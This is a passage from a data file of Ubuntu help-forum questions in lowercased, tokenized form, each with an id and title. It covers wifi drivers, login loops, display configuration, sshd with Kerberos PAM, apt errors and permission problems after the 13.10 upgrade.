same usb drive with no hdd password -- same issue as before this is the computer i have , with no modifications , and prior to installing ubuntu , i completely wiped the drive . i also have full power and it 's plugged in , so that 's not it either . i have been searching askubuntu for responses for the same issue , and have only found solutions for people who lost their password , which i obviously did not if i was able to change it . i will say that i am a first time user , so i 've no idea if it 's a pebkac error that is completely going over my head . thanks for any assistance you can provide . i found this solution and it cleared some of the graphical errors . it does still return to the login screen , but here 's what happens : enter correct password loading circle black screen with mouse black screen no mouse black screen with mouse login screen again , it takes only a few seconds , but there were no beeps this time . i will continue to search for solutions and update as i find them . this solution also did not work for me . i performed both steps . i do not have a .xauthority file , and my /tmp file now reads exactly as it says there . i am still experiencing the login loop . this solution did not work . i do not have a .xauthority file , so no solutions involving that will work either . fixed here so i 'm not really sure this should really count as a fix , but whatever . i reinstalled ubuntu 13.10 from the same disk and same file , but this time i checked one of the boxes that said login automatically . it logs in automatically now , and to make sure it worked completely , i locked it , and logged back in fine , then logged out and logged back in fine . i 'm not really sure i wo n't have the issue again later . based on the number of login loop posts , i would recommend trying all of the other solutions above before this , because in the long run , those should work while this might not .
371298	ubuntu 12 : no dvd , usb,	after installing ubuntu 12 on an external usb i can not access hard drive any more , also no access to usb storage , dvd , mp3 device ... .etc . all worked fine with ubuntu 8 up till 10 ! hard drive might have some errors but it used to work ignoring them at start up with 8 & 10 . what should i do ? ps . booting from cd for ubuntu 8 & 10 i can use hard drive and all .
371300	how do i get a usb wi-fi d-link dwa-125 rev d1 rtl8188etv working ?	guys . dwa-125 rev.d1 , rtl8188etv . ubuntu 12.04 lts . lsusb , iwconfig , ifconfig , ip addr , lshw -c network : root @ gugenot-ms-7597 : ~ # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 058f:6362 alcor micro corp . flash card reader/writer bus 001 device 004 : id 2001:330f d-link corp . bus 002 device 002 : id 09da:000a a4 tech co. , ltd optical mouse opto 510d root @ gugenot-ms-7597 : ~ # iwconfig lo no wireless extensions . eth0 no wireless extensions . root @ gugenot-ms-7597 : ~ # ifconfig eth0 link encap : ethernet hwaddr 6c:62:6d : a7 : a3:99 inet addr:192.168.137.109 bcast:192.168.137.255 mask:255.255.255.0 inet6 addr : fe80 : :6e62:6dff : fea7 : a399/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3791 errors:0 dropped:0 overruns:0 frame:0 tx packets:2394 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3715856 ( 3.7 mb ) tx bytes:354575 ( 354.5 kb ) interrupt:43 base address:0x6000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:170 errors:0 dropped:0 overruns:0 frame:0 tx packets:170 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20868 ( 20.8 kb ) tx bytes:20868 ( 20.8 kb ) root @ gugenot-ms-7597 : ~ # ip addr 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 6c:62:6d : a7 : a3:99 brd ff : ff : ff : ff : ff : ff inet 192.168.137.109/24 brd 192.168.137.255 scope global eth0 inet6 fe80 : :6e62:6dff : fea7 : a399/64 scope link valid_lft forever preferred_lft forever root @ gugenot-ms-7597 : ~ # lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : 6c:62:6d : a7 : a3:99 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.137.109 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:43 ioport : e800 ( size=256 ) memory : dcfff000-dcffffff memory : dcff8000-dcffbfff rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 is installed without errors . modprobe -r rtl8192cu modprobe rtl8192cu swenc=1 echo `` 2001 330f '' > /sys/bus/usb/drivers/rtl8192cu/new_id iwconfig dmesg | tail -20 : < pre > < code > root @ gugenot-ms-7597 : ~ # dmesg | tail -20 [ 116.464842 ] type=1400 audit ( 1383584988.604:28 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /usr/share/gvfs/remote-volume-monitors/ '' pid=1894 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 [ 406.018811 ] type=1400 audit ( 1383585279.029:29 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=900 comm= '' cupsd '' pid=900 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 944.530863 ] type=1400 audit ( 1383585819.155:30 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=900 comm= '' cupsd '' pid=900 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 1487.813757 ] cfg80211 : calling crda to update world regulatory domain [ 1487.845269 ] usbcore : registered new interface driver rtl8192cu [ 1507.324866 ] rtl8192cu : chip version 0x10 [ 1507.453467 ] rtl8192cu : mac address : 00:00 : ** : ** : ** : ** [ 1507.453480 ] rtl8192cu : board type 7 [ 1507.453780 ] rtlwifi : rx_max_size 15360 , rx_urb_num 8 , in_ep 1 < /code > < /pre > so , does it mean that driver is installed successfully ? but iwconfig gives nothing for wlan0 again . help me , please , avoid going back to windows ...
371301	ubuntu 12.04 64b toshiba fan problems	problems with the operation of the coolers on toshiba satellite a305-s6905 . not turn on even with high temp ( +/- 70 째c ) or stay working without stop even with low temp . ubuntu 12.04 lts 64-bits . thanks ! no problems registered in mw7ue 64-bits ...
371302	make my ubuntu , use more swap than ram	so , i have 786 mb ram with 1.6 gb swap . i want to increase the usage of swap . in other words , i want my ubuntu to use more swap than my ram . please tell me , how to do it
371305	how to set proxy settings to view youtube from china in ubuntu ?	i am new for ubuntu os , now i am in china . i can not open youtube so i want to know which proxy setting will allow to view youtube videos ?
371307	how do i either uninstall ubuntu or get my wireless internet to work	i 'm sorry its a vague question but i 'm stuck with 2 options : a ) uninstall ubuntu and reload windows xp onto my laptop ( which i would rather not do as i really like ubuntu - despite how unused to i am with it ) or b ) somehow get my wireless internet to work . with a , i kinda know what to do : boot the cd from the bios menu and load from there ( i have installed new os ' a couple times before ) . the only problem is i have 2 options when i reboot my pc : f9= boot device menu ; f10= rom based setup . f9 does nothing but take me to another menu where my only 2 options both take me to the gnu grub screen- where my normal boot takes me anyway . and f10 takes me to a menu that says setup password , which has not been set up and i cant find any evidence of a factory/default password . i have 3 attempts and i have no clue what to do about that . now with b , when my laptop ran xp the wireless worked perfectly . now the only way i get internet is in my living room - which is massively inconvenient for me seeing as my room is outside . i have downloaded the driver from 'additional drivers ' , reset my computer ( with difficulty , it also does n't seem to like turning off , so i have to 'kill ' it ) and still nothing ! i have looked all over the internet trying to find solutions but i just cant seem to get it to work . i also have a usb wireless stick but i ca n't load the driver from the cd . i am very new to linux , not very technical and in need of help ! -running ubuntu 12.04 32bit on a hp compaq nx6325 notebook thank you to anyone who replies , its much appreciated
371308	unable to install ubuntu 13.10 on atom processor	i have an acer laptop with an intel atom cpu n2600 1.6ghz , 2gb of ram and 360gb hdd out of which i have partitioned 100gb for the ubuntu installation . i have burned the installation disk on a usb flash drive . i have also set the boot priority to boot from the usb drive . when i start my laptop , it boots to the ubuntu screen , asking to choose the language followed by different options to install ubuntu , try ubuntu without installing , etc . i select install ubuntu , and every time i do that the system restarts . please advise .
371312	how to make sshd create non-existing user when using kerberos ?	i am setting my sshd to use kerberos auth . everything was fine until i actually login via ssh . i got invalid user . if i added the account to the server running sshd , then i could login using password on kerberos . do i have to add the account ? how to make sshd create the account itself ? **pam.d/sshd** , no pam.conf and pam.d/common-* auth [ success=3 default=ignore ] pam_krb5.so minimum_uid=1000 forwardable=true auth [ success=2 default=ignore ] pam_unix.so nullok_secure try_first_pass auth [ success=1 default=ignore ] pam_lsass.so try_first_pass auth requisite pam_deny.so auth required pam_permit.so auth optional pam_cap.so account required pam_nologin.so account [ success=3 new_authtok_reqd=done default=ignore ] pam_unix.so account [ success=ok new_authtok_reqd=ok default=ignore ] pam_lsass.so unknown_ok account [ success=1 new_authtok_reqd=done default=ignore ] pam_lsass.so account requisite pam_deny.so account required pam_permit.so account required pam_krb5.so minimum_uid=1000 forwardable=true session required pam_script.so onerr=success dir=/usr/local/etc/security/ session [ default=1 ] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_umask.so session optional pam_krb5.so minimum_uid=1000 forwardable=true session required pam_unix.so session sufficient pam_lsass.so session optional pam_ck_connector.so nox11 session optional pam_motd.so session optional pam_mail.so standard noenv session required pam_limits.so session required pam_env.so session required pam_env.so user_readenv=1 envfile=/etc/default/locale password [ success=3 default=ignore ] pam_krb5.so minimum_uid=1000 forwardable=true password [ success=2 default=ignore ] pam_unix.so obscure use_authtok try_first_pass sha512 password [ success=1 default=ignore ] pam_lsass.so use_authtok try_first_pass password requisite pam_deny.so password required pam_permit.so password optional pam_gnome_keyring.so
371313	upgraded from 13.04 to 13.10 now just a gray screen as gui	i 've been using xfce because unity does n't work for some time . i have a gray screen with a mouse pointer , sometimes a logo at bottom of screen says `` ubuntu '' , but nothing else on screen . i can ctrl-alt-f1 to get to terminal . i deleted ~/.cache/sessions to no avail . tia ! michael
371314	auto restarting asterisk and mysql using upstart	i want asterisk and mysql to be able to auto-restart if anything were to happen to it , like if it crashed . i found a guide with what i 'm looking for , but it 's written assuming that the /etc/inittab is in use . how would this guide translate to an upstart based version ? here is the guide : how to : auto-restart asterisk
371315	how to get my friend 's os information	i am thinking that is there any way that i can know the os information of my friend 's using internet in ubuntu . suppose a friend of mine is in my buddy list ( gmail , yahoo , facebook , and skype ) . is there any way that i can know which os he is using ? at least linux , or windows or mac or etc ( only name without more details ) . also without knowing him . thanks in advance .
371316	resolution changes after resuming from standby and sometimes at login screen	i have installed the proprietary driver for my nvidia geforce gt 630 , however after i resume my computer from standby the resolution changes to 1024x768 while my monitor maximum resolution is 1360x768 . today also booted in 1024x768 , and checking the log i saw that x requests 1024x768 resolution ! why ? log here . the computer is runnning ubuntu 13.10 and the monitor is connected to dvi port with a dvi to vga adapter .
371324	disabling bluetooth on start not working	my question is related to this question . i would like to deactivate bluetooth on start up , unfortunately the proposed solution to add : rfkill block bluetooth to /etc/rc.local before exit 0 does not work on my acer aspire 1810tz running ubuntu 13.10 with an intel advanced wifilink n-6235 . neither does the suggested solution for thinkpad laptops . what does work is to add : /etc/init.d/bluetooth stop to /etc/rc.local , but this disables the bluetooth applet , which i need to enable the bluetooth easily when i want to use bluetooth . so the question is why does n't rfkill block bluetooth work and how do i make it work again ? thanks !
371330	regarding installing ubuntu on macbook	i have macbook with os x 10.6.8 , am a student and i want to install ubuntu on my machine virtually using virtual box i do n't have dvd option so want to do it with usb can you please help . thank you vamshi
371336	how to reboot from failed installation	i just tried to instal ubuntu 13.10 on my old laptop . i started the installation using a dvd . i do not know why , but the installation bugged during the login ( just after asking for email adress , name ) . the `` register later '' , `` back '' , and `` continue '' buttons were not responding anymore . so i restarted my laptop . now i only have a black screen and a blinking cursor showing up after the asus screen . neither f12 nor inserting the dvd in the reader get ubuntu to reboot . i had chosen the installation erasing my old windows os too , so i guess it erased windows.. any help would be really welcome to get out of this dead end . thanks
371338	ca n't move windows to lower or upper workspace	ever since i upgraded to ubuntu 13.10 , i ca n't move workspaces to upper or lower workspace using the ctrl + alt + shift + up/down arrow . i am able to move them right or left . i can even move them down/up using the workspace switcher on the launcher .
371339	how to make packages for arm in launchpad ?	when i request builds in this recipe it only creates 32 bit and 64 bit packages . how to create packages for arm ? i am using quickly .
371340	try ubuntu just for a week and after that bring it back to its earlier state . is it possible ?	so , my dad is not at home and i want to try ubuntu . is this possible to use ubuntu for a week and after that , bring everything normal . { remove the grub , remove the partiton done , etc . } i know that we can use live ubuntu but it is very slow on both cd and usb .
371345	ca n't update to 13.10	i tried to upgrade my ubuntu 13.04 to 13.10 , and upgrade has failed due to connection problem . after fixing this problem and restarting my laptop , i could n't update ubuntu . software updater does n't even start , software center starts but does n't shows any software . i guess some of system files got broken . how can i fix it ?
371346	external hdmi poor quality	when pluging an external hdmi display , it get detected and everything was supposed to be working right out of the box , except that when set the resolution to 1920x1080 , the display on hdmi is really poor quality . playing around with xrandr , when setting resolution at 1680x1050 or below , everything is smooth , when setting 1920x1080 or 1920x1080i , with wide variety of refresh rates , it 's the same poor quality display . unfortunely i ca n't post an image showing the exactly issue ( low reputation ) . specifications : dell inspiron 14 ( intel hd graphics ) samsung ta550
371348	easy way to know all programs and utilities real names from terminal ?	every time i try to get a program from terminal i do n't find it because it does n't match the real name . example : disks name in terminal is gnome-disks . so what the easiest way to know all programs equivalent names in terminal without suffering of try to find the name every time ?
371350	having trouble installing any form of ubnutu onto my fresh amd build . via usb	title says it all , i initially tried manually installing then used lili and then the exe recommended by ubnutu getting an array of error 's . basically need someone with experience too walk me through . this is my first time installing a linux os .
371351	no wifi in ubuntu 13.10 wih sis 163u	i am very new to linux , and ubuntu specially . i installed ubuntu 13.10 on my fujitsu-siemans amilo li1818 , and i ca n't find any wireless adapter . i have a sis 163u chipset . so please help .
371355	how to change the sort order of a specific folder in nautilus	i want all the files in my downloads folder to be sorted by modification date , but all other folders , and files in other partitions to be sorted by name . how can i do that ? edit : i want nautilus to remember these orders for each folder .
371358	how to open abiword ( or writer ) in fullscreen via terminal	i`d like to learn how to open writer or abiword in fullscreen via terminal . i mean opening without nesessery to tipe f11 after opening . can that be done ?
371359	how can i install vmware on ubuntu 13.10 ?	how can i install vmware in ubuntu 13.10 , as virtual box crashes the whole time or does n't want to work 100 % ? i 've tried the solution at this site , but i get errors in terminal when i try the commands . vmware can me used as the same as virtualbox , right ? i want to install a different os inside ubuntu using vmware . please assist me in this .
371361	13.10 viewportin display/resolution issues	this is my first it posting . i am having issues setting a resolution that is persistent when rebooting/restarting the xserver . i am running 331.17 as my driver , i have tried the other drivers as well . before 13.10 , using a metamode option worked perfect for my tv , however now i 'm unable to get these settings to stick . my line in my xorg.conf file is option `` metamodes '' `` 1920x1080 +0+0 { viewportin=1920x1080 , viewportout=1804x1014+56+36 } '' on 13.04 i used the following option `` metamodes '' `` dfp-0 : 1920x1080 { viewportout=1804x1018+56+32 , viewportin=1920x1080 } '' , dfp-1 : 1920x1080 { viewportout=1804x1018+56+32 , viewportin=1920x1080 } '' i have tried to use that line as well as my entire xorg.conf backup that i had made previously . that option gets removed . i should also add that this was a fresh install . if i run nvidia-settings -- assign 0/currentmetamode= '' dfp-1 : 1920x1080 { viewportout=1804x1014+56+36 , viewportin=1920x1080 } '' in a terminal , it sets my resolution , and allows me to play games . with 13.10 , in nvidia-settings , the option for viewport in gets changed to 1804x1014 , setting it back to 1920 x1080 will fix the panning issues , but i can not for the life of me figure out how to make this load and startup and stick . not that it made a difference either way , currently i am using gnome 3.10 . hopefully i did n't bloat this whole post and make it confusing , if anyone could lend a hand , it would be much appreciated . thank you very much !
371362	error when trying to install/remove programs after upgrade to ubuntu 13.10	i have a problem with policykit , when i try to install programs in ubuntu software-center ( similar messages in synaptic or muon ) : the problem started after upgrade from 13.04 to 13.10 . when i try to remove / install programs i get notification : you are not allowed to perform this action ! you do n't have the required privileges to perform this action when you open details you see this : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.44 ' } ) : org.debian.apt.install-file i already checked : policy kit is present in autostart , so that is not the problem . when i log in as root user ( instead of user account that i regulary use ) i have no problems . this is the generated error report in /var/crash/ maybe related bug i also tried to add my user to the group root , now my user is in these groups adm dialout cdrom sudo audio plugdev staff users fuse lightdm mlocate netdev bluetooth lpadmin admin sambashare kismet root what exactly are the rights , i need to be able to access the software center as user ? also related to policykit error when trying to install/remove programs in the software center edit : maybe this problem has to do with it that i also can not mount usb-devices since the upgrade if i start nautilus as the normal user . i have to start withgksudo nautilus to be able to mount the usb-stick with the button on the left side ( as root then ) maybe it has to do something with the packages installed , here is the output of dpkg -l
371364	linux as l2tpv3 client	i 'm looking for a way to get either my ubuntu box or a kvm instance to act as an l2tpv3 client to the l2tpv3 server . it has to be l2tpv3 without ipsec . the ubuntu version is 12.04.3 lts . any pointers on the steps to accomplish this will be appreciated . -madhu
371366	is there a libreoffice equivalent to microsofts office themes ?	i 've used ms office for many years now . especially powerpoint . one of the strengths is that it defines and separates the concepts of template and theme . a theme can be saved and contains fonts , colours , and a set of images that can be reused every time you create a new presentation . this ensures that everyone in your organization uses exactly the same colours and fonts all the time . now i know that you can download templates for libreoffice , but i have not seen anything similar to the theme concept . the file extensions used in ms office are the following for the two concepts mentioned : example powerpoint template file name : mytemplate.potx example powerpoint theme file name : mytheme.thmx now back to my question : do these concepts and their separation exist in libreoffice or openoffice ? if so , how do i create them ?
371369	installing kde alongside ubuntu 12.04	i would like to install kde alongside ubuntu 12.04 with following commands : sudo add-apt-repository ppa : kubuntu-ppa/backports sudo apt-get update and then below command get some error : sudo apt-get install kubuntu-desktop the error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kubuntu-desktop : depends : kde-window-manager e : unable to correct problems , you have held broken packages . any helps would be great .
371374	where did the menu bar clock go ?	i like having a clock showing the current time and date in the menu bar , but this morning when i logged in it 's not there anymore . everything under system settings > time & date > clock is greyed out . ubuntu 13.10 64-bit .
371376	root username is different to admin username	i have somehow changed my root username which seems to have caused my system to disallow me to mount usb , cdrom . my normal username is jenchris , however if i type : su root ( and enter the password ) then it shows root @ jenchris-h55m-ud2h : /home/jenchris # ( please note the hash at the end of the username ! ) i think i accidentally hit the hash key at some point whilst typing my username ... . this is causing huge problems as i have lost lots of permissions , eg can not mount usb drives : if i plug in my usb drive , it appears under 'devices ' , but if i click on it , i get : unable to access samsung , not authorized to perform operation output of ls -l /media is total 4 drwxr-x -- -+ 2 root root 4096 nov 2 21:51 jenchris i also do not have the privileges to : run software centre or software updater ; press the gui shut down or restart buttons ; unlock my account in the 'settings - user accounts ' section ( padlock is greyed out ) .
371377	nautilus symlink target column	is there any way to add a column to nautilus ' list view which shows the target of any symlinks in a directory ?
371382	how do i install oracle 11gr2 enterprise on ubuntu 13.04 ?	i want to install oracle 11gr2 enterprise on ubuntu 13.04 . and i was not able to find any answer . can anyone tell me how to install it step by step ?
371383	boot device not detected	i 'm new to ubuntu . recently i 've installed ubuntu 13.10 ( 64 bit ) on my old desktop . intel g31 motherboard , intel core 2 duo 2.66 ghz , 3gb ram , pata 160gb hdd . there is only one os , no windows . each time i turn on the pc this error message is displayed : a bootable device has not been detected please refer to the product guide < intel link > but after i restart with alt+ctrl+del it boots to the os just fine . is there any solution ? thanks in advance .
371390	why do i need to relaunch dkpg-reconfigure keyboard-configuration after every startup ?	i 've switched recently to an uk keyboard , from a fr keyboard . it is an usb keyboard , and first i plugged it in , i had to launch dpkg-reconfigure keyboard-configuration in order to request the correct layout ( ie : uk ) . but after every reboot of the machine , the laytout comes back to the fr layout . how can i make the modification persisting ? i am using ubuntu , running the stump window manager . and here is the /etc/default/keyboard at any time ( that is right after startup , and before and after i run the dpkg-reconfigure tool ) xkbmodel= '' hhk '' xkblayout= '' gb '' xkbvariant= '' '' xkboptions= '' terminate : ctrl_alt_bksp ''
371391	xubuntu 13.10 : automount usb sticks	i have a freshly installed xubuntu 13.10 on the lenovo t520 laptop . in the settings manager â removable drives and media i have the mount removable drives when hot-plugged and mount removable media when inserted checked . but when i insert an usb-stick ( vfat ) it does n't get auto-mounted . so i ca n't access it from terminal . it gets mounted only when i click on the drive icon on the desktop or in thunar . can i fix it somehow ?
371393	upgrade to ubuntu 13.10 in a virtualbox : gnome desktop not working	i had ubuntu 13.04 running in a virtualbox ( the host is winxp ) . i 've upgraded it to 13.10 but i 've some issues : gnome desktop is not working correctly ( i can log in but the main menu bar remains empty - i can only log out with ctrl-alt-backspace ) i can not build and install the virtualbox guest addons : when trying to build it , it says : me @ virtuntu : /etc/init.d $ sudo ./vboxadd setup removing existing virtualbox dkms kernel modules ... done . removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . building the main guest additions module ... done . building the shared folder support module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) doing non-kernel setup of the guest additions ... done . in the log file , i see the following error : /tmp/vbox.0/dirops.c:292:5 : error : unknown field ‘readdir’ specified in initializer .readdir = sf_dir_read , ^ /tmp/vbox.0/dirops.c:292:5 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/vbox.0/dirops.c:292:5 : warning : ( near initialization for ‘sf_dir_fops.flush’ ) [ enabled by default ] make [ 2 ] : *** [ /tmp/vbox.0/dirops.o ] erreur 1 make [ 1 ] : *** [ _module_/tmp/vbox.0 ] erreur 2 make : *** [ vboxsf ] erreur 2 creating user for the guest additions . anyone had a similar experience ? any clue to help me ? thanks a lot !
371394	how to remap caps lock key to shift left key ?	i wa n't to remap the caps lock key to the shift left key , so that when i press caps lock the functionality of shift left is processed . is there a file in ubuntu where i can specify this ? i know , under /etc/default/keyboard you can specify some keyboard options , but not this one .
371397	ubuntu touch for galaxy tab p1000	i would like to know if i can install ubuntu touch on a samsung galaxy tab p1000 .
371400	default mount point changed for external hd	the default mount point for my external hd changed when upgrading from 13.04 to 13.10 . now the username is added as an extra level before the hd label . so it used to be /media/nameofhd and now it became /media/username/nameofhd this breaks a lot of links i have set up to this disk . i know that i can mount it manually and even automatically through /etc/fstab . what i want to know is why this behaviour changed and how i can change it back to the original ? blkid and fdisk do n't show anything suspicious . thx !
371401	please install an mta on this system if you want to use sendmail !	i get this message in /var/log/apache2/error.log everytime a cronjob on my desktop wgets a php page that tries to send an email . how can i install a dummy so this message is gone ? i already have installed lsb-invalid-mta but still .
371403	installation problem 13.10 : bootloader did n't install	tried installing 13.10 on a new build . went clean untill the end when i got a message the bootloader did n't load properly and i need to download it manually . did n't manage to do it by my self . thanks
371408	maas node incorrect login incorrect ?	i successfully booted my vm from network through pxe but i ca n't use my log in username and password to login . also , it changed to ubuntu login to node login . what should i do ?
371409	what programs and packages are updated by the update manager ?	the update manager periodically checks for available updates for packages installed through the ubuntu software center . does the manager also check for available updates for the programs installed via deb file ( for example : skype , opera , virtualbox , etc . ) ?
371411	how to customize lxpanel/menu on lubuntu ?	does anyone know `` how to add item pcmanfm or some programs likes terminal , anjuta or more programs on panel menu '' . the configuration file located on ~/.config/lxpanel/lubuntu/panels , but i dont know how to add this item . thanks .
371412	ssh login , how to set keys to user accounts	i have 3 people with 3 windows machine and 1 ubuntu 12.04 server . i have created each user account and added them to the sudo group . i have copied the public keys straight from puttygen straight into the authenticated_keys file . i want to know how to tell each key to allow a specific user in . all the keys end in rsa-ssh `` date '' . all the keys work for my account but not for any of the other accounts when i want one key to work for one account . i have tried adding user @ computername at teh end of the key in the authenticated_keys files , but no luck . i just get no supported authentication methods available . i have looked all over google but cant find a easy explanation . thank you for any help .
371416	skype making high pitched noises - ubuntu 13.10	i have a problem with skype in ubuntu 13.10 . when i try to make a call or when any application sound plays , my laptop starts making high pitched noises that wo n't stop until i quit skype . do you have any ideas ?
371417	new install of 13.10 tried x64 and x32	i am trying to install v 13.10 to my vaio machine . all of the sites show how to install re v 12.04 . when i insert the cd in the drive i get the opening screen and i click for install then i only get a screen with ubuntu in the middle and dots that change from red to white and nothing else . 1 hour later the same screen is still there ? i have tried the x64 and x32 versions but i have installed fedora and it works
371425	wrong display configuration used by lightdm in ubuntu 13.10 when laptop lid is closed in docking station	since upgrading to ubuntu 13.10 on my laptop ( actually to xubuntu as i switched to xfce ) i 'm running into problems with lightdm : i use two external displays ( one 24 '' and one 22 '' display ) connected to my laptop docking station . after installing the nvidia driver 319 i used nvidia-settings to configure both displays to use twinview and the correct native resolutions . i also stored this configuration in /etc/x11/xorg.conf . right now when i login my display setup is `` loaded '' correctly . however , lightdm seems to ignore my setup : each time the login screen is presented in clone mode instead of twinview with a wrong-sized ( too small ) background image for the 24 '' display . how can i fix this ? update : i just noticed that lightdm uses the wrong display setup ( i.e . clone mode ) only when the laptop lid is closed in the docking station . when i keep the laptop lid open ( even with laptop display disabled ) lightdm behaves correctly and uses the exact display setup as i configured for my x session . solutions for simular questions which involve using xrandr in a script and running it with the option `` display-setup-script '' or similar in the /etc/lightdm/lightdm.conf do n't work : my script ( see below ) is executed but the resolution wo n't change . when executed manually in an x session , the script works perfectly . probably something is being overridden/enforced by the nvidia driver here ? i already tried nvidia drivers 304 , 319 and 331 without success . with 13.04 the problem did not occur , i did n't even need a script for lightdm . my current script ( /usr/share/lightdmxrandr.sh ) : # ! /bin/bash extscreens= $ ( xrandr -q | grep -c `` dp- [ 02 ] connected '' ) if [ [ $ extscreens == 2 ] ] ; then xrandr -- output dp-2 -- primary -- mode 1920x1200 \ -- output dp-0 -- mode 1680x1050 -- right-of dp-2 -- output lvds-0 -- off else xrandr -- output lvds-0 -- mode 1280x800 -- output dp-2 -- off -- output dp-2 -- off fi exit 0 /etc/lightdm/lightdm.conf : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu display-setup-script=/usr/share/lightdmxrandr.sh session-setup-script=/usr/share/lightdmxrandr.sh greeter-setup-script=/usr/share/lightdmxrandr.sh solution : after switching from unity to xfce , the solution was the following : install the default lightdm greeter for xfce : apt-get install lightdm-gtk-greeter xubuntu-default-settings change the corresponding line in /etc/lightdm/lightdm.conf : before : [ seatdefaults ] greeter-session=unity-greeter ... after : [ seatdefaults ] greeter-session=lightdm-gtk-greeter ... now all displays are configured correctly at the lightdm login screen .
371426	ca n't mount dvd with photos on it ( superblock )	i am trying to open a dvd with photos on it in ubuntu 12.04 and i get this error : error mounting : mount : block device /dev/sr0 is write-protected , mounting read-only mount : /dev/sr0 : ca n't read superblock all the libdvdcss2 etc , are installed and i have tried the suggestion from here : unable to mount read-only dvd with photos but it is a slightly different error , as he does n't have the superblock error ! any help ?
371427	lost privileges since upgrading to 13.10	since upgrading to 13.10 , i no longer have the 'privileges ' to do the following things : mount usb/cdrom drives run software centre or software updater press the gui shut down or restart buttons unlock my account in the 'settings - user accounts ' section ( padlock is greyed out ) also , when logging on as a guest user i get error messages relating to compiz crashing with sigsegv and it hangs on a blank wallpaper screen . however , i still am able to use sudo in the terminal . output of 'groups ' is jenchris adm dialout cdrom sudo audio video plugdev lpadmin admin pulse pulse-access sambashare sudo usermod -u username does n't have any effect
371428	music player with nested playlist	is there an mp3 player / manager that supports nested playlists ? for example , for iron maiden i would have : iron maiden |- long songs |- short songs so playing `` iron maiden '' would play both `` long songs '' and `` short songs '' playlists , but i would still be able to choose just `` short songs '' .
371429	using a qhd+ display with ubuntu 13.10	i 'm planning on buying a dell xps 15 9530 ( http : //www.dell.com/us/business/p/xps-15-9530/pd ? oc=smx15w8p003 & model_id=xps-15-9530 ) , which only comes with a qhd+ display ( 3.200 x 1.880 ) . i would like to know if ubuntu 13.10 does work reliably on such display ? also , i 'd like to use the laptop together with a full hd external display . will that be possible or would switching displays basically mean switching font sizes and such manually ? thanks !
371430	how to install latex packages for tex live ?	apparently i am using tex live as my latex distribution : martin @ martin-xps-8300 : ~ $ pdflatex -v pdftex 3.1415926-2.4-1.40.13 ( tex live 2012/debian ) kpathsea version 6.1.0 copyright 2012 peter breitenlohner ( etex ) /han the thanh ( pdftex ) . there is no warranty . redistribution of this software is covered by the terms of both the pdftex copyright and the lesser gnu general public license . for more information about these matters , see the file named copying and the pdftex source . primary author of pdftex : peter breitenlohner ( etex ) /han the thanh ( pdftex ) . compiled with libpng 1.2.49 ; using libpng 1.2.49 compiled with zlib 1.2.7 ; using zlib 1.2.7 compiled with poppler version 0.20.5 i would like to install additional packages using this guide . they say : with tex live manually installed , use tlmgr to manage packages individually . tlmgr install < package1 > < package2 > ... tlmgr remove < package1 > < package2 > ... but when i try : tlmgr install algorithm2e i get : tlmgr : command not found i also do not seem to have a ~/texmf folder , only a ~/.texmf-var folder . is my installation corrupt or am i doing something wrong ? edit : i found that i actually have a /usr/local/share/texmf edit2 : the command : apt-cache policy texlive results in : texlive : installed : 2012.20120611-5 candidate : 2012.20120611-5 version table : *** 2012.20120611-5 0 500 http : //jp.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status folder .
371431	broken files in /var/lib/apt/lists/	due to an issue with my proxy , i might have several broken files in /var/lib/apt/lists . when i execute apt-get update i get the following error : : $ sudo apt-get update [ ... ] fetched 486 kb in 47s ( 10.2 kb/s ) reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_quantal-security_multiverse_i18n_translation-en e : the package lists or status file could not be parsed or opened . i know beforehand that the file contained wrong information . i tried to clear it ( with a simple echo `` '' ) but it did n't work . i also tried to rm it but did not solve the problem either . i can not further update/upgrade my system because of that . how could i solve this ?
